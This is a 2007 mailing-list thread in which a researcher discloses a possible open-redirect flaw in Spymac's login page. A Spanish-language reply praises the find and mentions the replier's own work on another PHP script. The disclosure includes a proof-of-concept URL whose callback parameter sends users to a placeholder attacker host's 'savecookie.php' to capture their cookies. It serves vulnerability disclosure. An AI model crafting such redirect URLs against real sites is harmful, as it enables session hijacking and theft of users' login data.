Posible ilegal redirection on Spymac Leapfrog
0 views
Skip to first unread message
Lostmon
Mar 5, 2007, 3:09:37 PM3/5/07
to los...@googlegroups.com
Posible ilegal redirection in login.php ...
a remote attacker can compose a special crafted URL and wen a user
login in this
URL the attackers can gain access to the user cookie or some other
information submited by this user.
a remote attacker can compose a special crafted URL and wen a user
login in this
URL the attackers can gain access to the user cookie or some other
information submited by this user.
a simple demostration of this situation :
http://[VICTIM]/http://www.spymac.com/login.php?callback=http://[ATTACKER]/savecookie.php
Related:
http://classic.spymac.com/forums/showthread.php?threadid=266954&post=5120972#post_5120972
--
atentamente:
Lostmon (los...@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
FalconDeOro
Mar 7, 2007, 4:22:42 AM3/7/07
to los...@googlegroups.com
Hehehehhe, buen trabajo Lostmon, ahora yo estoy con el EGGBLOG, un
script escrito en PHP y bueno le he encontrado unas cuantas cosas,ya
ire publicando poco a poco , prefiero investigarlo más
script escrito en PHP y bueno le he encontrado unas cuantas cosas,ya
ire publicando poco a poco , prefiero investigarlo más
Un saludo
El 5/03/07, Lostmon <los...@gmail.com> escribió:
--
Atentamente:
FalconDeOro (falcondeoro.gmail.com)
Web-Blog: http://falcondeoro.blogspot.com
Reply all
Reply to author
Forward
0 new messages